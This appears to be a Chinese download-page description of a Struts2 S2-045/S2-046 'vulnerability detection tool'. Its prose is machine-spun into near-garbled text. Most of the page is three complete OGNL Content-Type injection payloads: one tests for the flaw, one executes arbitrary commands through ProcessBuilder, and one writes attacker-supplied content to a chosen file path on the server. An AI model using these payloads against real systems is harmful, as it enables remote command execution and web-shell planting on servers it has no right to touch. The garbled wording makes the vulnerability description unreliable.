struts2倾向检测工具是款颇为优异的零星倾向检测工具。struts2倾向检测工具可能辅助用户检测收集、零星、邮件、效率器的倾向，辅助用户飞腾紧张解倾向有可能组成的劫持以及损失，对于以探测的倾向妨碍修复，实用防止黑客侵略。

struts2倾向检测工具简介：

2017版削减S2-046，民间宣告S2-046以及S2-045倾向激发原因同样，只是运用倾向的位置爆发了变更，S2-046方式可能绕过部份WAF防护，存在S2-045就存在S2-046。当Struts2开启devMode方式时，将导致严正短途代码实施倾向。假如WebService启动权限为最高权限时，可短途实施恣意命令，搜罗关机、建树新用户、以及删除了效率器上所有文件等等。

struts2倾向检测工具功能介绍：

一、验证倾向，更正Content-Type，返回内容为“webpath”代表存在倾向。

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).

(#_memberAccess?(#_memberAccess=#dm):

((#container=#context['com.opensymphony.xwork2.ActionContext.container']).

(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).

(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).

(#res=@org.apache.struts2.ServletActionContext@getResponse()).

(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('web')).

(#res.getWriter().print('path')).(#res.getWriter().flush()).(#res.getWriter().close())}

二、实施命令

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).

(#_memberAccess?(#_memberAccess=#dm):

((#container=#context['com.opensymphony.xwork2.ActionContext.container']).

(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).

(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).

(#res=@org.apache.struts2.ServletActionContext@getResponse()).

(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new

java.lang.ProcessBuilder('[cmd]'.toString().split('s'))).start().getInputStream()).useDelimiter('AAAA')).

(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).

(#res.getWriter().close()).(#s.close())}

三、上传文件：

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).

(#_memberAccess?(#_memberAccess=#dm):

((#container=#context['com.opensymphony.xwork2.ActionContext.container']).

(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).

(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).

(#res=@org.apache.struts2.ServletActionContext@getResponse()).

(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new

java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).

(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).

(#res.getWriter().close())}